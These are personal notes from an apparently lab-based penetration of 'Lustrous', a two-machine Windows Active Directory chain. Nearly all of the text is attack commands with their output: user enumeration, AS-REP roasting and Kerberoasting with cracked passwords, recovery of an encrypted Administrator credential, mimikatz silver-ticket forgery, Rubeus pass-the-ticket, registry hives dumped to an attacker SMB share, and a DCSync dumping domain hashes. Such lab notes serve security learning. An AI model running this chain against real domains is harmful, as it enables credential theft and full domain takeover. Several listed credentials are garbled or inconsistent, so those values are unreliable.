Lustrous (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username

Password

Method

Scope

ben.cox

Trinity1

Asreproasting

Domain User

svc_web

iydgTvmujl6f

Kerberoasting

Domain Users + SPN

tony.ward

U_cPVQqEI50i1X

Silver Ticket

Domain User

✅ Valid Usernames

ben.cox
svc_web
tony.ward

🔑 Passwords list

Trinity1
iydgTvmujl6f
PVQqEI50i1X

Information Gathering

Nmap Scan

Nmap scan report for 10.10.205.53
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-24 23:10:26Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53990/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53991/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
54030/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
54047/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Nmap scan report for 10.10.205.54
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Service Enumeration

10.10.205.53

FTP

FTP Anonymous Enabled
Users found into the FTP server

DNS

Not vulnerable to DNS Zone Transfer

SMB (enum4linux-ng)

Root/Parent Domain
Domain SID: S-1-5-21-2355092754-1584501958-1513963426
Domain: lustrous.vl
FQDN: LusDC.lustrous.vl
SMB Signing: True (Not vulnerable to NTLM Relay)
Server allows null session authentication

HTTP:80

401 Unauthorized indicate the presence of Kerberos authentication

Kerberos

User enumeration revealed valid usernames using statistically-likely-usernames/john.smith.txt

Compromising LUSMS

Initial foothold on LUSMS

Discovering Users within FTP Service

❯ ftp 10.10.205.53
<SNIF>
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM       <DIR>          ben.cox
12-26-21  11:49AM       <DIR>          rachel.parker
12-26-21  11:49AM       <DIR>          tony.ward
12-26-21  11:50AM       <DIR>          wayne.taylor

Discovering users via kerberos user enumeraiton

❯ /opt/kerbrute/kerbrute userenum -d lustrous.vl --dc 10.10.205.53 /opt/statistically-likely-usernames/john.smith.txt  -t 65

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/24/25 - Ronnie Flathers @ropnop

2025/04/24 19:16:06 >  Using KDC(s):
2025/04/24 19:16:06 >  	10.10.205.53:88
2025/04/24 19:16:24 >  [+] VALID USERNAME:	jeremy.clark@lustrous.vl
2025/04/24 19:16:28 >  [+] VALID USERNAME:	wayne.taylor@lustrous.vl
2025/04/24 19:16:44 >  [+] VALID USERNAME:	rachel.parker@lustrous.vl
2025/04/24 19:16:49 >  [+] VALID USERNAME:	donna.collins@lustrous.vl
2025/04/24 19:16:50 >  [+] VALID USERNAME:	tony.ward@lustrous.vl
2025/04/24 19:16:56 >  [+] VALID USERNAME:	ben.cox@lustrous.vl
2025/04/24 19:17:00 >  [+] VALID USERNAME:	deborah.harris@lustrous.vl
2025/04/24 19:17:01 >  [+] VALID USERNAME:	tracy.roberts@lustrous.vl
2025/04/24 19:19:52 >  [+] VALID USERNAME:	michelle.john@lustrous.vl

Cracking the ben.cox password using hashcat

❯ hashcat -m 18200 ben.cox.asreproast /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$ben.cox@lustrous.vl@LUSTROUS.VL:2c3c4f66302bb71d9a6e03b23a681410$adee35575ead0679c058b564d3cd8212d296274a95e73f7cda711efab2a33191e9531c18c19cb6f26c0101ae253969de7c30c1ae60b54436c889b2d260b4baa14ebe0f3b88613f43a70a391fbe00769e1550aed99310b2e579c05615885c7f864c981be53eeede541af71fe284f28f1cc9cc3e7a84164dd373057e7224bf969b80f2bff026465634f327640bf69208f4354e2b5cbc78be22e124269bd3fe772b5d3be32fdbc73e7128201c11f236c91df82a60a69c1bac572d905bf2891d36b38d6876d56672a0eed1f5a58fe5e6fd48edf174dc7c3782b7c4830909ab0b58e55416fa34d133ac3cadc1:Trinity1

Valid Credentials: ben.cox:Trinity1

Discovering kerberoastable users using the valid credentials

❯ nxc ldap 10.10.205.53 -u 'ben.cox' -p Trinity1 --kerberoast kerberoast.hashes
SMB         10.10.205.53    445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
LDAP        10.10.205.53    389    LUSDC            [+] lustrous.vl\ben.cox:Trinity1 
LDAP        10.10.205.53    389    LUSDC            Bypassing disabled account krbtgt 
LDAP        10.10.205.53    389    LUSDC            [*] Total of records returned 4
LDAP        10.10.205.53    389    LUSDC            sAMAccountName: svc_web memberOf:  pwdLastSet: 2021-12-22 07:46:12.670282 lastLogon:2025-04-24 19:11:22.617108
LDAP        10.10.205.53    389    LUSDC            $krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$da8f529fc816f65caabde1b3dbf4e2a4$2106b480be3dc60793c9f42b7ef73c9342491cd23a330190aa4117634902acad72ce64a75bae757f4ad5499555b9d03a42592f53fca25e34a7671347d74fb9e4f77c50b3f2207d3a15f7e7332a33d6f3903dcc7ae8f250f0b8ebabc2e1b7fec2545a462f372a579fb4cfbf4874eb8a97fe2ea0ce2f724a6932f35592205a39bce10160aba0f46746379ed238df509dcdbd58b36625d677a25f28c2067217a75c8cc8cec72b14def9b1aa0315a8c568f21b7946244309707f003ca745e0d5880962fe20fd56e9dc19ac01ee80334799a4c6aab78b4ba5250a09fa6e787683789c8464f013cc26bc482c17762e677856c5ee1b57f329a28b6bffcd80b8dafa2e382a7865942167d58c69ccebdb5774cc3b0c677ed8b59cc05bf4e1eee5085548e540fd4ade2c20f1ac35d430ca5cfdff098c7acbeccfbc339a37f5bdc048b3161f3628f70dfcaabd64faba97e190c13d64b394d62ad8a5a41824987664ebb21d3057678d53ad205ff1dd12d433fa395f2fa84c9963bf22bd4946b56a8b0ed015204b43d827b242aa60882f67500a510cced77f310bf3192e9019dbc8518c307c03882d88a3f2e66b9126d85d3d01cbcacb47a044d87058f0dfe7dfee0b53cb56c302ff6759e1e7050d8b7df6785066458c74a13753faa3db1679e250cea5495fb90c78aa469d7dd5ae01c0008ae4b76558891d4278a93396a8e4e3e06a736012bc6974e98a12fae3b90f093def76467dc3bffa7f2bbf7b5e0074bb07b196d328b258729355ada1259584cd8779735bd4b23ba51d61e45528259ddd8db77783cf9079e7866ab05498557147b212f2fa39afdc27f72836272c7c491ce9da4aad213493adbf04f93893ec16cb7411d5378501c749b49534ad85789eaeb1beedb3a1e187b17c997bc332adb8e23899b41df3e0f8b1085f997c3725f88d94ac0017f05998ee3318579cfa50cfed9851a369debed37980039e5254c67bcbbc48f5f2f948bbe885993db3eb9aa2a98496c44d65f19beb5bf9148bd0b8e1e206c6a3ad1305dbf3da3efbb91c538dfd4ed03e4bfbd731936e4f05db3382b837af593129c57eeed34cb548347a17f92ac4d1d1deffd1303e36b7931ad93c8a778518f4e2adb7b2817a2334d5e3b5d231caf9923c6dd849f3fab02a94c4efb3ecc17e8b46e174c7b34fa3726b5fdfcfba263114c0747da460afe5282264996fdf883a4393dc0d4160530e9b33cbdb40ded4f5ff6ff6050f6db268fb8240ffe76868ff93ca4003effc6d4c5c505e475fa898dbac6ba1f2831a710e1619bf5c0c6552b7252be03626f8c55b70f01d581034aed244bc4ff5d46d8c7096c43c4d6bbde6a6b14673a74a2ad6218248b4c2715d7541e51a24fc73c1ea23b8805b36993230ff02f04479864d97c44dd11eebccd589cc780c8b24a404b183ca110ecc82e1cce8a9d158441f3280
LDAP        10.10.205.53    389    LUSDC            sAMAccountName: svc_db memberOf:  pwdLastSet: 2021-12-22 07:46:34.170590 lastLogon:<never>
LDAP        10.10.205.53    389    LUSDC            $krb5tgs$23$*svc_db$LUSTROUS.VL$lustrous.vl/svc_db*$efcccffe3c3015bc3cca86242387c196$8277be700edbccc3fbab3a27f069cedb3422e176aff7a301633c1f493738cec7e7fc9d4dc4194f972658fbfabf46f967c73b70a476055e9d6faa42c7c5a17d2baa0f87492c2d4d50c8074c4d41e7f3c1a270b0758cda98f3c2c8ca7226734969cea9024981b9b8bff79cd6066815993cac21c45774a7c4fda04fd8859ae2c0281caf6e47bb8993123a621221907fc4a9ef0f9ac81bc630e65fac18d229965dbc70f4e91fd1207267746a87d6b2408cad166bfe50c57d0095b526d28dc97f714666c3ff9f59b05f59245344239417807c33ce1609fbcfeca101a3e3d1531bf95f05f2c959bc51bd8ea77c0a507f628b74c4a5c530fdffd41e523031accc24840e3fdbddae6ae8c07afeb53f51ae78fe557e5a64be4ecd7fe1bd789740ebc534f28ec66b048e997f6199d88c048e6c375fd9e662b94af250fe9c7c8b8c8e6d1252461f8f8bf04424ecbf857d8e846746115a048147bbe8c4cac5e7caf46240ebc36768e0802ae1e212576375dd72036b4bcfc267057e117bf22a0569eeb934938407683080260f2c326edc1e0c6ef953c9a27148af07e0c5d36177fae3b594bf6b0d811aefc7c8e29dd0e6f7b7a696f854a0ecec13d96ca225bd9d9dd63453525ee039d596ad9ddae99e923c35d25508784e28c5a21ae4087aa86e311f8c5ae648dba5e8e0c10f290ac59db5455f8ecb61c8c22de325e3d816b95b327c0ebcb4b4990a3a09d25101e6e47190839cb66c654eb6a5cc83c7f437ce25331fbf978ffdf74fec0b2c0c8e136fdc550b85b729fe0f4f48ab166806dad5cdaa3967cf84fd43f246e357fac9624042931bc8b8999e21566fccad7327bd1c71332389bcdeb87f4da76ca9d20629d0f6a64ab08ca17b209c7604f30420b069fb9eac8e465e82b8e6bc4604f652c4d52eeb453943e475724b9e3822bfacab48f5632eca8131557f5b25d77bd44d25fb19bc474b96172f8bde541fa6a0de44fc950618aa4825a532b5f926d570f217ae26874a1a8439eff2e15988af7d0efa116356978b07a4aa9ce944eb8cd555f6834140673a2ff208f61d8e75135d4e3a5c6efa2005b53213f09d3cf8fb78623b4976d14a2b71b6a8b9f0e2e5f4a3e712bfffef749fcaa0e62a84d041caf8a0e2edf697d16462aadce3647798e6ab2f48a5c6954e81029fc2d7d5b70edaa21f28e6819de295d5946d2bc1d77b87a1a0b82574907f6d3c74d75533b672965225359dbd781711063888c44d09ead1f20570b4d9134102f290416b669789bf8295955a1bbb5e945841d639fd8ccc714cae1221492e0a7d40751915d72f12940cf63ac3b9041b2f8aed5acfac94c8c4da5ca63c666a06afe1e5eb66fe4c72193f317278881cf5efba2854b14f069c34594e0821e0c2143f2d49755502d5ddcdcf7f2df5985b1f27735049437215cd6d20f9382696ef2975c9613808acae

Cracking ticket grating service for svc_web

❯ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$d15d33ad313766eb651c4100bd94dd8d$92afc5f7afb008e0bed45da82da0919e9480cdd1c7ba62fd33afdc6b1486ad840e34925e2947df69f71119a8f37539307948e6432f399472631d3a4d45a6275782ee2d55fbc7b44ec271086f339df2245ee1b427c62a7bc40b9b054867792d8e88e16c2d4c920469fff9acdfacad840bbd062f75184fdef1cccd2e28e119e643b18508923300462f6c654d92d08eeebece4fc282ef3670737c751dfbc69f7facf3e1652054a52da44995f6a92a10ed3bd87a2a1e79266552a5f5fcf146c62e133fde4c3d517c87c9e649ba160affcd3ad39df45d8de2765c202e78dfe0e9716058d10d292cfb7a0e1b17dd30e089e4aa56eae9e6e490d98c0acffb2f7f18c41c000aac15491eba844d790b461e4e152c658119fc0ce0bcaf7a857328f8780a1e0a0681418c080d3286603005cff774a04f391d4fdf4f2c1ab8a9c856aa9fbf595e1e8a7b8c9bd5d4c83039556dbdf64409855950f6c52f91df01d04e012386c1b9aa3b1d57cf4c5e17cb59e56dd93b27b753f9e5baf038a8953ab1d9cfdd4e7638119811f46eda3329713c942d363fecd7e21a8e8b1deffa4c1565ad232114f2099e23f7f387dea95dd6c29f615bac1659584239e6bc55e4d89945040679d3375f98f44001a710d97457ecfd110877c5dcc315b5d3c40cfbe830aa6769939422df2df7fc1a5f8539bf50bb11c4da7649ae3c680137c7f7c2992b11ebb0e96f82fc1de96ab5311167ba2de729d36bea07079fd90fd6373b314dcda9393b5fe1c69bb04395de26c288cbb5a292514ef2687f29de0f7dd619959716dba804ec6162b01203b6598cdd509373e9fdb9d6876a7c873cda540afa31cdc3fa2ef2ae1b5ab5cfecb44a6eeba60b7f663ae12ad9bd40c7b71c3fe6d017663e60d626bdd5728ac4f2c6dbb4f5a6cb4e01c6414c49b277dbc1441dde8444926b7913b7ab5bcf7e491560f158a54d28238499f4b02c4514bd78307731a0db0d17f1ee46490427f6959373b400856bb2c2b929121e22d6f29502a44952bec64badc0bd1c812d41bbb6d012f330e9899ec60b675f776a917eca6217642af26d2e0c93b1e413df9a769111117b4de78f9b0e566d01ea8060950b85458762cbe7b9a5ec4b1c603f2c5791c1c1201c35e575c4b5c42bfdd6b3ffd6b0e3c06447bb0ffe7161c19b5e7ca749c2cbeebdb1d90d549bbe3badd32177a05a599ae0d401f43a627e0ff0c6c73d75fd4d53f3fe08edc947b3756d1b69b14a1ca797e172f5f902abc505615b2536d8f54936402bedba1c22866a6682d73a721d45d94a7d00eec8038b7c4beaa3618e5907f462f6e404c9233d4a878eeb1745af8f0a8216cde9d87d6bc2a791ad2f9be991669b340c5962ca08db56194cd50d20ee5aa2d401ceb525da15ec89b1792d4bbcf9716f778127cd43165efa17a82a9ea0ce8f9fe7d21cda75a08dd54bd70468:iydgTvmujl6f

Valid Credentials: svc_web:iydgTvmujl6f

Privilege Escalation to Administrator

Retrieving the administrator credentials

During the enumeration the tester found a System.Management.Automation.PSCredential object in admin.xml that containing the Administrator credentials encrypted.

The tester used Import-CliXML to obtain the administrator's plain text credentials.

*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred = Import-CliXML -Path C:\Users\ben.cox\Desktop\admin.xml
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred.GetNetworkCredential().username
Administrator
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $Cred.GetNetworkCredential().password
XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
*Evil-WinRM* PS C:\Users\ben.cox\Desktop>

Authenticating as Administrator in LUSMS

❯ evil-winrm -i 10.10.205.54 -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Compromising Domain Controller (lustrous.vl)

Authenticating into lusdc.lustrous.vl website with valid credentials

Using ben.cox credentials the tester was able to authenticate to the web site using kerberos authentication.

Discovering a high valuable target using Bloodhound

While analyzing BloodHound, the tester discovered a highly valuable target, tony.ward, who is a member of the Backup Operators group. This group allows users to dump the SAM, SYSTEM, and SECURITY registry hives, as well as the NTDS.dit file.

Knowing that, the tester proceeded to use svc_web account and create a silver ticket to access to the application on behalf of tony.ward.

Crafting silver ticket for tony.ward using mimikatz.exe

PS C:\Users\Administrator> .\mimikatz.exe privilege::debug "kerberos::golden /domain:lustrous.vl /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:HTTP /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /ptt" exit
 .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08                                                                                                                                 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                                                                                                  ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                                                                                                     ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # kerberos::golden /domain:lustrous.vl /user:tony.ward /id:1114 /target:lusdc.lustrous.vl /service:HTTP /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /ptt
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : HTTP
Target    : lusdc.lustrous.vl
Lifetime  : 4/26/2025 4:52:33 AM ; 4/24/2035 4:52:33 AM ; 4/24/2035 4:52:33 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

Requesting to the web application and discovering tony.ward credentials

PS C:\Users\Administrator> (iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials).Content
<SNIF>
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<SNIF>                              <tr>
                                    <td>
                                        Password Reminder
                                    </td>
                                    <td>
                                        U_cPVQqEI50i1X
                                    </td>
                                    <td>
                                        lustrous_tony.ward
                                    </td>
<SNIF>
PS C:\Users\Administrator>

Abusing Backup operator to compromise domain controller

PS C:\Users\Administrator> .\Rubeus.exe asktgt /domain:lustrous.vl /user:Tony.Ward /rc4:78b83ed65c7286b2a434bdba026244e4 /nowrap /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 78b83ed65c7286b2a434bdba026244e4
[*] Building AS-REQ (w/ preauth) for: 'lustrous.vl\Tony.Ward'
[*] Using domain controller: 10.10.140.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFnjCCBZqgAwIBBaEDAgEWooIEtTCCBLFhggStMIIEqaADAgEFoQ0bC0xVU1RST1VTLlZMoiAwHqADAgECoRcwFRsGa3JidGd0GwtsdXN0cm91cy52bKOCBG8wggRroAMCARKhAwIBAqKCBF0EggRZMo0v1quCpiZ3nrLx09abXaRGJvnPpf2+9lgTFMPFzVqgtBV+ejoEu2qfMhooaFmRZns3kqDakWJQnBV8eNWX/GX+j74PqqqhJgBbHy8OQQuqwJi2h3f5AlE8KbQ35X+MlwnwVGCE4YMAjRIcER7ff6gV27uBKaETE8I+GtvQfE5Dror4g7YEnX97UdE4MUV7wpBh+Xxo86KJJIPVyHZa2ha49NiCGQdkF/0uUmTIlE+nlxLiLeaoaJd9OAaQVK3fLHJBZV/BhkXw3VtytFbxx0j+kn0GyN78veMC5Vrpbi8TczzLXUjGRq7/DvNibjw37nC6ZgPIFc+bamVvUaDr46o3egXBDdMo9AqBjNeoj2vM57MYo4xtILExbkBokx5LMU/f/DgKlCqUAjljG/iH7iXtQs9VQ5YUx6uvqpHWsSwm3AfJMB3YoHGh3f1JvPeU1dhHK2zJjACjb6jE/7k8u0KqSffPQAIcoqPQaDKarALzbEReguPXV7ftnHxc28ADx6xRi8eqllmY8vGMfQBUHyLjzEbPEvOEE7LSmzcsgP90IZyGT0T/bc8+TvG+Wdo8Z6NQYDc9sl7+sHRzKjAwZjLaLeYRpZVVe9Pp6rin9gjVOSGzdVpoFmK2fKfTgVCfdZuMbPFcF+sAfQT3YH1Xfu/5KWLIC5/Xld0R92bGU5QXqelx3UyyMByax3T3tGej+qJvjnRefH4GsaPeIky1wx5+S+VvpWvKRYW93tw/LlQNjg0ZHz+0MCAyGM/U/sCj00JADM5327fBlNFhmvL/qZcrS/ezT54tUapiw3n4qgMvXwT3bRQytguE5KuvREoKZPqqOrA7N5kb2LRFCLzUqPE/fCH8Q/ldUOwok5XvMwMMwz09f6he0OivInODhECZ6GGpa54bWLepuygIaofaJez9xbRv/iX15hCVszm4nV4127Mbub7zuDp9xsYldPDKZJD72YLBRGEtEAt5msL96gkyJbnzBIgc1QFKA8BgafycR+yB55PBfBO/4sypkV+sRunRzoAcx6D7IjaISMXUq4z7y54LAe/9AxCXGxsd1t2LjY3a9d3vy+HkMn8YLdh2LqqUGdrHIuG0p12PfxQQ1gbM0Hg2PZZX8w0nwgoCyDIeIBDoHspvd1pV5GRSm0db/7Od8ftDpHcrL6UQmB2otoD5bS28F3m1hVKw5xcfcOO3yju0vQOahI6RlXggXtJC1Qwzpl/EJ6BrsCnLSiBKu6ww9fZFs63r/cqG7aJTCmrZeciLuImwo2I4LKYoPrngdUM0P5qEmDaZSgOMEPjITtQziQSeQ8q1XsoxH7U7IzlWiJRBkTZmGFT3GFFZy5seELW0dy4sJ55zbwzBwHcY21WhQnIvtKnxXPuyYROSD9wsUeqTtMbz232c9Q3Kk+yoWbcfIf1ZxjoVBkjJ7UOcNxihKpvSh/zL3Zxb5zROJHkCWe5jk1qWWF9N6tFSykWNWP/j7GIYJfqno4HUMIHRoAMCAQCigckEgcZ9gcMwgcCggb0wgbowgbegGzAZoAMCARehEgQQSOGhobYVXRTX3r3n2uYuy6ENGwtMVVNUUk9VUy5WTKIWMBSgAwIBAaENMAsbCVRvbnkuV2FyZKMHAwUAQOEAAKURGA8yMDI1MDQyNjA1MDU0M1qmERgPMjAyNTA0MjYxNTA1NDNapxEYDzIwMjUwNTAzMDUwNTQzWqgNGwtMVVNUUk9VUy5WTKkgMB6gAwIBAqEXMBUbBmtyYnRndBsLbHVzdHJvdXMudmw=
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/lustrous.vl
  ServiceRealm             :  LUSTROUS.VL
  UserName                 :  Tony.Ward
  UserRealm                :  LUSTROUS.VL
  StartTime                :  4/26/2025 5:05:43 AM
  EndTime                  :  4/26/2025 3:05:43 PM
  RenewTill                :  5/3/2025 5:05:43 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  SOGhobYVXRTX3r3n2uYuyw==
  ASREP (key)              :  78B83ED65C7286B2A434BDBA026244E4

Dumping Registry Hives using BackupOperatorToDA

PS C:\Users\Administrator> .\BackupOperatorToDA.exe -u tony.ward -p U_cPVQqEI50i1X -d lustrous.vl -t \\lusdc.lustrous.vl -o \\10.8.5.48\smbfolder\
Making user token
Dumping SAM hive to \\10.8.5.48\smbfolder\SAM
Dumping SYSTEM hive to \\10.8.5.48\smbfolder\SYSTEM
Dumping SECURITY hive to \\10.8.5.48\smbfolder\SECURITY

Dumping the Local Security Authority

❯ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e10fc3898a203cbc159f559d8183297:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:0981fd4f8fc47444e5e696ca6626c7a336eb220d0534ca23ad6a2bb042f5fdd25e030ce6015fdb518d40685530ab5193ec9272c3513f0f6a0280aed3ef7eaa92c0730a287a2ef933b5c4e870a0233b44b81d35e33efe5d62ae847f84bef14b3fcf57930a49cba029e740800ae4f9721558b913de32531fa5bc89ba06d00748573d0b6935502b24852b8fa2ea74e1def3f6bb1d633f0531a686f61d2f66bf338e0b39d51da37488dd446e3982ed239bcf9395ca463cacd3c695eb0ff09e74f977e792e2cbcf786b5015ad7062de0e39f1a429390e0b843d8fb04a96280b1a28252afa3155c713ac260af165655e7897ec
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:fb2c49ead49730d2b4e701c4bd169af4
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...

Performing DCSync Attack

❯ impacket-secretsdump -k -no-pass lusdc.lustrous.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8d9c7bd6de2a14237e0eff1afda2476:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:39049058eaa5309ce13788c31fcba8a4:::
lustrous.vl\Deborah.Harris:1104:aad3b435b51404eeaad3b435b51404ee:87009f579ed9bc7dd01c6d369c3f99b8:::
lustrous.vl\Duncan.Spencer:1105:aad3b435b51404eeaad3b435b51404ee:64587f4044d57329db255cbed249ce4e:::
lustrous.vl\Brenda.Andrews:1106:aad3b435b51404eeaad3b435b51404ee:70f159bb0c84242302014ce70a7f5ae6:::
lustrous.vl\Rachel.Parker:1107:aad3b435b51404eeaad3b435b51404ee:924bb1caac4986b7c95097f33336980a:::
lustrous.vl\Wayne.Taylor:1108:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::
lustrous.vl\Hugh.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:46213f1b9d43de00629e338e0b040029:::
lustrous.vl\Tracy.Roberts:1111:aad3b435b51404eeaad3b435b51404ee:b291d04a0d7b6cdb63b46727a38f1b86:::
lustrous.vl\Bradley.Hancock:1113:aad3b435b51404eeaad3b435b51404ee:cbadf75321c9aa0a47b403ef1e0a7c55:::
lustrous.vl\Tony.Ward:1114:aad3b435b51404eeaad3b435b51404ee:78b83ed65c7286b2a434bdba026244e4:::
lustrous.vl\Joanna.Hall:1115:aad3b435b51404eeaad3b435b51404ee:7837938248efd8b5d6115c8cce33159a:::
lustrous.vl\Marian.Elliott:1116:aad3b435b51404eeaad3b435b51404ee:2663fd84b68f22555d66508b7fddb28e:::
lustrous.vl\Ben.Cox:1117:aad3b435b51404eeaad3b435b51404ee:779041047eed27dc382579f2e9c1bd78:::
